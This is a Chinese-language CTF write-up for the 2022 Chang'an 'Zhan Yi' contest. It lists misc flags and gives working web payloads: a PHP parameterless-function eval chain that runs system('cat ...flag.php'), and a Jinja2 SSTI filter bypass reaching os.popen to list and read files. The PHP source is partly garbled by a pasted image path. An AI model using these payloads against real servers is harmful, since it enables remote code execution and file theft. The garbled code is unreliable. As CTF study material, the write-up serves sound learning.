长安“战疫”网络安全卫士守护赛writeup

admin • 2022-01-11 09:20 • 安全

长安“战疫”网络安全卫士守护赛writeup

misc

八卦迷宫

得到flag

cazy{zhanchangyangchangzhanyanghechangshanshananzhanyiyizhanyianyichanganyang}

西安加油

tcp流里面找到base64编码

在线转为zip解压

拼图得到flag

cazy{make_XiAN_great_Again}

web

RCE_No_Para

<?php
if(';' === preg_replace('/[^W]+((?R)?)/', '', $_GET['code'])) { 
  if(!preg_match('![img](file:///C:UsersM1kealAppDataRoamingTencentQQTempSysV7(XMWRN]{G8~CI}BCCR3QC.gif)ssion|end|next|header|dir/i',$_GET['code'])){
    eval($_GET['code']);
  }else{
    die("Hacker!");
  }
}else{
  show_source(__FILE__);
}
?>

参考链接

PHP Parametric Function RCE · sky’s blog (skysec.top)

所以paylaod：

?m1kael=system(“cat%20/var/www/html/flag.php”);&code=eval(current(current(get_defined_vars())));

Flask

根据提示

admin?name=payload?1.js?

然后过滤了[]和_

参考链接

以 Bypass 为中心谭谈 Flask-jinja2 SSTI 的利用 - 先知社区 (aliyun.com)

所以payload：

{%print(lipsum|attr(%22u005fu005fu0067u006cu006fu0062u0061u006cu0073u005fu005f%22))|attr(%22u005fu005fu0067u0065u0074u0069u0074u0065u006du005fu005f%22)(%22os%22)|attr(%22popen%22)(%22ls /%22)|attr(%22read%22)()%}

然后

{%print(lipsum|attr("u005fu005fu0067u006cu006fu0062u0061u006cu0073u005fu005f"))|attr("u005fu005fu0067u0065u0074u0069u0074u0065u006du005fu005f")("os")|attr("popen")("cat%20/f*")|attr("read")()%}%20.js?

Flag配送中心

CVE-2016-5385

vulhub漏洞复现 · Ywc’s blog (yinwc.github.io)

本图文内容来源于网友网络收集整理提供，作为学习参考使用，版权属于原作者。

THE END

安全

二维码

攻防世界-MISC:simple_transfer

< <上一篇

WEB安全之代码执行漏洞

下一篇>>

搜索内容

长安“战疫”网络安全卫士守护赛writeup

长安“战疫”网络安全卫士守护赛writeup

misc

八卦迷宫

西安加油

web

RCE_No_Para

Flask

Flag配送中心

最新文章

分类

标签云